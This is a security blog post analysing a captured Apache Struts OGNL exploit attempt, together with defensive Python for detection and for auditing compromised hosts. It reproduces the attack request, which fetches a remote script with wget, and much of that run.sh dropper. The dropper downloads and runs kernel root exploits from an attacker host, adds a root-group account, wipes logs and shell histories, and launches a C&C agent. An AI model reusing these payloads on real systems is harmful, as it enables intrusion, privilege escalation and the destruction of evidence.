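Banner:

    220 Serv-U FTP Server ready (constructed banner)

---------------------------------------

IP:  ***61.174.51.213***

ISP: ***Example Telecom (constructed)***

Port: ***137***

Banner:

    WWW-0C90D5E834F <0x20>
    WORKGROUP <0x00>
    MAC: 00:24:e8:54:29:32

Port: ***5432***

Banner:

    could not create socket: Too many open files
"""

# Subset of the OUI lookups listed in the post, keyed by the first three octets.
OUI_TABLE = {
    "00:19:bb": "Hewlett Packard", "00:1e:0b": "Hewlett Packard",
    "00:1e:c9": "Dell", "00:24:e8": "Dell", "bc:5f:f4": "ASRock",
}

HOST_SEP = "---------------------------------------"
IP_RE = re.compile(r"^IP:\s+\*\*\*(.+?)\*\*\*", re.M)
ISP_RE = re.compile(r"^ISP:\s+\*\*\*(.+?)\*\*\*", re.M)
PORT_RE = re.compile(r"^Port:\s+\*\*\*(\d+)\*\*\*\s*Banner:\s*\n(.*?)(?=^Port:|\Z)", re.M | re.S)
NBT_NAME_RE = re.compile(r"(\S+)\s+<0x20>")      # <0x20> marks the server service name
MAC_RE = re.compile(r"\b((?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b", re.I)


def parse_report(text):
    """Turn the script's markdown-ish output into one dict per host."""
    hosts = []
    for chunk in text.split(HOST_SEP):
        ip = IP_RE.search(chunk)
        if ip is None:
            continue
        isp = ISP_RE.search(chunk)
        services = {int(port): banner.strip() for port, banner in PORT_RE.findall(chunk)}
        hosts.append({"ip": ip.group(1), "isp": isp.group(1) if isp else "n/a",
                      "services": services})
    return hosts


def port_counts(hosts):
    """How many hosts expose each port (the 'Running Services' tally)."""
    return Counter(port for host in hosts for port in host["services"])


def netbios_names(hosts):
    """Server names from the NetBIOS (137) banners, as in the hostname grep."""
    return sorted({name for host in hosts
                   for name in NBT_NAME_RE.findall(host["services"].get(137, ""))})


def hostname_prefixes(hosts):
    """Tally the IDC-/WWW-/TENGYI- style prefixes."""
    return Counter(name.split("-", 1)[0] for name in netbios_names(hosts))


def vendor_counts(hosts, oui_table=OUI_TABLE):
    """Map each MAC seen in a banner to its vendor via the first three octets."""
    tally = Counter()
    for host in hosts:
        for banner in host["services"].values():
            for mac in MAC_RE.findall(banner):
                tally[oui_table.get(mac.lower()[:8], "unknown")] += 1
    return tally
```

Pointing `parse_report` at the saved output of the script gives the same numbers as the manual counts, and the vendor tally is where an unexpected OUI (anything not in the table) shows up as "unknown" rather than silently disappearing.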

Observations

Most of the hosts presented as Windows boxes running an ftpd; however, some also showed signs of running *NIX applications like Apache, SSH and possibly PostgreSQL.

Some possibilities come of this:

  • The IP in question is actually a gateway for a bunch of machines running behind a NAT
  • The IPs are Windows machines running virtual machines (they seem kinda old), or running cygwin/mingw.
  • I don’t know. Anything could be happening.

Conclusions

It’s hard to tell if these are just compromised, or if there is any organisation behind them. My suspicious mind likes to think the latter.

Unless someone jumps the gun, pops a few of these boxes and unravels the secrets they hold, I don’t think we’ll ever know. Oh well. They’re banhammered. whatever.

Thanks!

It All Began With a Struts Exploit Attempt. Part 1

This post, and the following posts in this series, is a joint operation between myself and @MalwareMustDie; check out his stuff at http://malwaremustdie.blogspot.com.au – Malware Must Die!

Where I work, my IDS is witness to hundreds and thousands of attacks upon the network daily. Every once in a while, something will pop up that will catch my interest… This was one of those.

[1:2017173:4] ET EXPLOIT Apache Struts Possible OGNL Java ProcessBuilder in client body

Quick Sidenote: The server they tried this against had been patched for this exploit

I have seen Struts exploits before, but this one stood out as interesting as these attacks are not that common compared to PHP-based attacks that pull down IRCBots written in Perl.

Content-Length: 515
Expect: 100-continue
POST / HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: xxxxxxxxxxxxxxx
Content-Length: 515
Expect: 100-continue
redirect:${#res=#context.get(com.opensymphony.xwork2.dispatcher.HttpServletResponse),#res.setCharacterEncoding("UTF-8"),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"wget","http://61.147.103.21:8080/run.sh"})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[20000],#d.read(#e),#res.getWriter().println(#e),#res.getWriter().flush(),#res.getWriter().close()}

Why hello there!

The fun part in that is:

{"wget","http://61.147.103.21:8080/run.sh"}

DON’T MIND IF I DO
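The IDS signature above fires on the OGNL expression in the client body. As an added example (not code from this post, MMD, or Emerging Threats), here is a small Python detector in the same spirit: it percent-decodes a request body (twice, to catch double-encoding) and reports which OGNL injection indicators are present. The sample bodies are constructed for the demo; the first is modelled on the payload shown above with the download URL removed.

```python
import re
from urllib.parse import unquote_plus

# Indicators of OGNL expression injection in a Struts request body, modelled on
# what the ET EXPLOIT signature above keys on. Patterns run against the
# percent-decoded body because attackers routinely URL-encode the braces.
OGNL_PATTERNS = {
    "ognl_expression": re.compile(r"[$%]\{\s*#"),                # ${#...} or %{#...}
    "processbuilder": re.compile(r"java\.lang\.ProcessBuilder"),
    "runtime_exec": re.compile(r"java\.lang\.Runtime\b"),
    "context_lookup": re.compile(r"#context\.get\("),
    "redirect_param": re.compile(r"(^|&)redirect(Action)?:", re.IGNORECASE),
}


def score_request_body(body: str) -> dict:
    """Return the OGNL indicators found in one request body.

    The body is percent-decoded twice so that a double-encoded payload
    (a common evasion) still decodes to the literal expression.
    """
    decoded = unquote_plus(unquote_plus(body))
    hits = {name for name, pat in OGNL_PATTERNS.items() if pat.search(decoded)}
    return {
        # An expression marker alone is not enough; require a second indicator
        # (a Java class reference or the Struts redirect: parameter prefix).
        "indicators": sorted(hits),
        "suspicious": "ognl_expression" in hits and len(hits) >= 2,
    }


def scan_bodies(bodies):
    """Score a sequence of bodies; returns (index, result) pairs."""
    return [(i, score_request_body(b)) for i, b in enumerate(bodies)]


# Constructed sample bodies (not captured traffic).
SAMPLES = [
    # 0: modelled on the payload in this post, download URL removed
    'redirect:${#res=#context.get(com.opensymphony.xwork2.dispatcher.HttpServletResponse),'
    '#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"id"})).start()}',
    # 1: the same idea, fully percent-encoded
    'redirect%3A%24%7B%23a%3D%28new+java.lang.ProcessBuilder%28%22id%22%29%29.start%28%29%7D',
    # 2: an ordinary login form post with a redirect *parameter*, not a redirect: prefix
    'username=alice&password=hunter2&redirect=/home',
    # 3: a literal "${100}" in a search string, no '#' so not an OGNL variable reference
    'q=price%20%24%7B100%7D',
]

if __name__ == "__main__":
    for idx, result in scan_bodies(SAMPLES):
        print(idx, result)
```

The `suspicious` flag deliberately requires two independent indicators so that a stray `${` in user-supplied text does not page anyone; tune the pattern set to the Struts version and parameter names your application actually accepts.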

wget

It's the shell script that never ends…

8484ddd6282dc0b90d4e903866dc1526 run.sh

This is a massive script… (view it in full here: https://gist.github.com/anonymous/c947a9c3109a5fe353e8)

#!/bin/bash

fcheckr00t()
{
    echo " [*] Downloading exploit No. $CNT.."
    if [ $(whoami) = 'root' ] 2> /dev/null
    then
        echo " [*] g0tr00t with exploit No. $CNT"
        GOTROOT=1
    else
        echo " [*] Failed to g0tr00t with exploit No. $CNT"
        CNT=$((CNT + 1))
    fi
}

fcheckdep()
{
    if [ $(which wget) -z ] 2> /dev/null
    then
        if [ $(which curl) -z ] 2> /dev/null
        then 
            echo ' [*] No downloaders found, try self-contained version..'
            exit
        else
            DLER='curl -s -o .profild.key'
            CURLIT=1
        fi
    else
        DLER='wget -q'
        CURLIT=''
    fi
}


fcheckdep
CNT=1
GOTROOT=''
mkdir exploits
cd exploits

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/1-2
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 1-2
        ./1-2
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/1-3
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 1-3
        ./1-3
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/1-4
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 1-4
        ./1-4
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/2.6.18-374.12.1.el5-2012
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 2.6.18-374.12.1.el5-2012
        ./2.6.18-374.12.1.el5-2012
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

------ SNIP --------

This thing is massive…

    $ wc -l run.sh
    1721 run.sh

    $ ls -alh run.sh
    -rw-r----- 1 xxxxxx xxxxxx 29K Sep  2 18:55 run.sh

This systematically tries each kernel exploit hosted on the attacker's web server, one after another, until one of them gets root.

------ SNIP --------

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER 'http://www.pingyan-china.com:8080/Linux_2.6(1).12'
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 Linux_2.6\(1\).12
        ./Linux_2.6\(1\).12
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/Linux_2.6.12
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 Linux_2.6.12
        ./Linux_2.6.12
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/vmsplice-local-root-exploit
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 vmsplice-local-root-exploit
        ./vmsplice-local-root-exploit
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/z1d-2011 
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 z1d-2011
        ./z1d-2011
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

cd ..
rm -rf exploits
CNT=''
DLER=''
CURLIT=''

if [ $GOTROOT = 1 ] 2> /dev/null
then
    RUSER='somesecguy'
    RPASS='g0tr00t'
    echo ' [*] Adding r00t user..'
    useradd -g 0 -G root -M -s /bin/bash -p $RPASS $RUSER
    echo
    echo " [*] Added r00t user: $RUSER"
    echo " [*] p455w0rd:  $RPASS"
    echo " [*] Clearing logs.."
    RPASS=''
    RUSER=''
    GOTROOT=''
    rm -rf /tmp/logs 2> /dev/null
    rm -rf /root/.ksh_history 2> /dev/null
    rm -rf /root/.bash_history 2> /dev/null
    rm -rf /root/.bash_logout 2> /dev/null
    rm -rf /usr/local/apache/logs 2> /dev/null
    rm -rf /usr/local/apache/log 2> /dev/null
    rm -rf /var/apache/logs 2> /dev/null
    rm -rf /var/apache/log 2> /dev/null
    rm -rf /var/run/utmp 2> /dev/null
    rm -rf /var/logs 2> /dev/null
    rm -rf /var/log 2> /dev/null
    rm -rf /var/adm 2> /dev/null
    rm -rf /etc/wtmp 2> /dev/null
    rm -rf /etc/utmp 2> /dev/null
    echo " [*] You g0tr00t, horray for you..."
killall -9 .profild.key
./profild.key &
    whoami
    id
else
    echo " [*] You didn't g0tr00t, sucks to be you..."
    whoami
    id
fi

After trying all these kernel exploits, if one of them returns successfully, it puts its own (blatantly obvious) user on the system, adds it to the root group, gives it a login shell, and then wipes the log directories and shell histories.

It then runs its C&C connector (which MMD has a full analysis of below) and awaits further orders.
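What the script leaves behind on a successful run is easy to audit for. As an added example (not code from this post or from MMD), here is a Python check that flags root-equivalent accounts that are not `root` and lists expected log locations that have gone missing, which is exactly the residue of the `useradd -g 0 -G root -M -s /bin/bash` and `rm -rf /var/log` lines above. The `/etc/passwd` and `/etc/group` contents are constructed for the demo; on a real host you would read the files instead.

```python
import os

# Constructed /etc/passwd and /etc/group content for the demo (not from a real host).
# The last passwd entry mirrors what the script's useradd line creates:
# primary group 0, member of root, a real shell.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
tomcat:x:106:112::/var/lib/tomcat:/bin/false
somesecguy:x:1001:0::/home/somesecguy:/bin/bash
"""
GROUP = """\
root:x:0:somesecguy
daemon:x:1:
www-data:x:33:
"""

# Locations the script deletes once it has root; their absence is an indicator in itself.
LOG_PATHS = ["/var/log", "/var/run/utmp"]


def suspicious_accounts(passwd_text: str, group_text: str):
    """Return (name, reasons) for accounts with root-equivalent rights that are not 'root'.

    Flags uid 0, primary gid 0, or membership in the gid-0 group, but only
    when the account also has a usable login shell.
    """
    root_members = set()
    for line in group_text.splitlines():
        name, _pw, gid, members = line.split(":")
        if gid == "0" and members:
            root_members.update(members.split(","))

    findings = []
    for line in passwd_text.splitlines():
        name, _pw, uid, gid, _gecos, _home, shell = line.split(":")
        if name == "root":
            continue
        reasons = []
        if uid == "0":
            reasons.append("uid 0")
        if gid == "0":
            reasons.append("primary gid 0")
        if name in root_members:
            reasons.append("member of root group")
        if reasons and not shell.endswith(("nologin", "false")):
            reasons.append(f"login shell {shell}")
            findings.append((name, reasons))
    return findings


def missing_log_paths(paths=LOG_PATHS, exists=os.path.exists):
    """Report expected log locations that no longer exist.

    `exists` is injectable so the check can be exercised against a fake filesystem.
    """
    return [p for p in paths if not exists(p)]


if __name__ == "__main__":
    for name, reasons in suspicious_accounts(PASSWD, GROUP):
        print(f"{name}: {', '.join(reasons)}")
    print("missing:", missing_log_paths())
```

One caveat worth knowing when reading the script: `useradd -p` expects an already-hashed password (as returned by crypt(3)), so passing a plaintext string the way run.sh does leaves the account with a password that will not verify; the account is still a gid-0 shell user and still an indicator, which is why the check above looks at group membership and shell rather than the password field.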

Now we pull apart some ELF binaries.

Here's where my main man MalwareMustDie comes in. Most of the things it pulls down are ELF binaries; MMD is the master of these, so I'll leave those to him. I'll be posting a few of his analysis runs on this post, but this will be a two-parter.

Most of these seem to be various kernel exploits for privilege escalation, but we got some other binaries too; MMD will be looking at those.

I’ll slowly be going through the scripts and other text-based files here and will tie them into MalwareMustDie’s ELF analysis.

Here’s MMD’s initial hash’n’file run on all the lovely toys we found:

// #MalwareMustDie China ELF factory Case PM: @yinettesys 
// root directory of http://61.147.103.21:8080/ (116 files)
// date: Tue Sep  2 19:49:44 JST 2014
// pic snapshot: https://lh6.googleusercontent.com/-9rJWeo2uEOE/VAWh2D3QnUI/AAAAAAAAQxc/tLOTAb-Pg3g/s2176/000.png

10:                          ca36d1dea2e237e34b2886028eace6e9  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
11:                          71798c31da9ebe7de0ae1046a338542c  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.16, not stripped
2-1:                         cc29a224e327412e0db7f3ce5c4f4e00  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
2-6-32-46-2011:              d0b9d58f3a454ad6df2e4d055858c1e5  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
2-6-37:                      0a656c6bc7eeabb467f6fa38ed57200b  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
2-6-9-2005:                  9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2-6-9-2006:                  9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.18-2011:                 a85d3f342ee981acd04ae01ecac90ce7  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x55603d8a443448ac0441b9826cb6ed2c9ca90c6a, not stripped
2.6.18-274-2011:             c599953283142f81e3dd00786ae5e339  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.18-374.12.1.el5-2012:    d28ad04b3d7ec12180aa0facde4a15d1  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.18-6-x86-2011:           f8f978474b8a0e3cd29c0ce2f1e2ce24  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=0xfadaca3ae23a563d41ab6b8ed8970e5c5bcadba3, not stripped
2.6.2-hoolyshit:             b41de74bfebb25385495b00f55f86d7b  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.20:                      b281ec632e9a1abf0512e6fb47a2b22d  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xbd01b2a57403681bb9e0b4430813c8ae24e7d437, not stripped
2.6.20-2:                    ecad97fd2f81edbdc64b464f5f41d615  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.22:                      7388c7836cfdf444d458ef71e14f3764  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.22-2008:                 7388c7836cfdf444d458ef71e14f3764  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.22-6-86_64-2007:         d42aff3eca031685a080401611980b68  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.23-2.6.24:               9016a062e7ca5da081c9e1fc7ec8a9d9  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.23-2.6.24_2:             07e6dc1d47bdd39f421456d9113410b7  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xe824f6f9d73ecf40e98bbcf03c5527b53a3e7f57, not stripped
2.6.23-2.6.27:               6dac57e2ed1c530373f5957620e3343a  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x0c1099606760b6d744fc70cf706022812004336f, not stripped
2.6.24:                      9016a062e7ca5da081c9e1fc7ec8a9d9  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.27.7-generi:             ed675f7cc64e171c13e8c1a48f59b050  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x9534017032ab79e62c33d3bbeac761a8909bfb62, not stripped
2.6.28-2011:                 32b3b21b03e2b3799012345a62e93bc7  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.32-46.1.BHsmp:           f2b00b27e6e8d10d3c27525ecd9af120  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.33:                      b3522ca1a328325a5eefba65eb8e75f3  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.33-2011:                 9332cf422fe610a3b992cc552c8dc329  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.34-2011:                 fb5f74894c583b21b7344c00847780ba  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
2.6.34-2011Exploit1:         1bc06341c684ee272b4b9dea21271818  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x783520ba58ba9a28710dbd45c33e7e91206f0f72, not stripped
2.6.34-2011Exploit2:         d723b2f9336a3c355fabe19af64f8191  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x63d51edaa09792f97739bc6bbc7f559033d2e1ba, not stripped
2.6.37:                      b4707633389d19d744c70bc174da2465  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.37-rc2:                  8043418c198c5ed597825c3fe8c93a20  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.5_hoolyshit:             3548a183765cec72bcc83ceaedbda8ce  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.6-34:                    eecd5209ab453cad03e700dd8dcb14e7  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x713bcde64c81e264bf6beb6e71a2320297203a9c, not stripped
2.6.6-34_h00lyshit:          716a1572c17feea66cbe0f5b5fbcb99a  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8d2704030a3ae325f7391a66dceffec4701f0e3a, not stripped
2.6.6_h00lyshit:             3a96db22d6fafc8fdb0629b5b02db7db  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.7_h00lyshit:             88fbdc17a050f5a0e61d020bbb8790c2  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.8-2008.9-67-2008:        9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.8-5_h00lyshit:           e01b59c242f92bf080cafe91d4c4b544  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x306ea825a585ec53602136866f4a8419c7140c9f, not stripped
2.6.8_h00lyshit:             155edeb351f0bf3bc1148f1c5b8a72cb  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.9:                       9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9-2004:                  227f80f70a3df0221bbc15183be99a29  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xaa828623ffd092a03a7c6b2bf5b2de116d14a7ef, not stripped
2.6.9-2008:                  9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9-34:                    0f59088fcc5f747b4eed7ce154070184  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x5ba63f88727116280f03f21195c698e2d50e694c, not stripped
2.6.9-42.0.3.ELsmp:          9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9-42.0.3.ELsmp-2006:     9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9-55:                    898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.9-55-2007-prv8:          898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.9-55-2008-prv8:          898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.9-672008:                9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9.2:                     9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.91-2007:                 898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2007:                        cf6c56ba83b118b59339fd973facc936  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2009-local:                  f632f166ba1b2d4c1dbfd3c3a6ae8f60  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xeff15dc54da4d86655f33396d9999a15f414c039, not stripped
2009-wunderbar:              efdab2a48ee969e9e5d92f5642f7a37d  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xfbf6f992609d6aaea4cabfe67ce3d29729ad9e6b, not stripped
2011:                        bf068e7234b88bdc5176e25020aec704  HTML document, ASCII text, with no line terminators
21:                          a22718f906df6efa9bbf85b62fd31e98  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
3:                           17260fd703b1a28bc9899c7a8e008ecb  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.8, not stripped
3.4.6-9-2007:                cf6c56ba83b118b59339fd973facc936  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
31:                          d38392c7fe801b017ec2374cf1a41ba4  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), corrupted program header size, corrupted section header size
314_amd64:                   4ae7bb3fdd984c36c1d54699eda83983  ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=0x0515130a8eb26a6d6146ef8d927fcc9418ed3567, not stripped
314_arm32:                   9810036e5bf9c6cb673e78ae61d90cca  ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, for GNU/Linux 2.6.14, not stripped
314_mips:                    cd70bf918ad2c59f0606a8f0ea24ce51  ELF 32-bit MSB executable, MIPS, MIPS32 version 1 (SYSV), statically linked, with unknown capability 0x41000000 = 0xf676e75, with unknown capability 0x10000 = 0x70403, not stripped
36-rc1:                      7f51fb0fb242d52b537923aee9dc86b4  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
4:                           fbe109c8a305326e3d6382931c79ea5a  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), not stripped
44:                          fe14f4015d87e0ba092a1938c210aa32  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
47:                          9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
5:                           bd30baa1366ca35328db8c65743c1cc2  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
50:                          2aa7b2ed3560dc38884c9dad5f3c5b27  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.16, not stripped
54:                          898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
6:                           898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
67:                          b65c4db2288501d1c0ba57d8a8a219bf  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
7:                           b5c86d43ca4c4cfb9e7bbecf311b4206  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
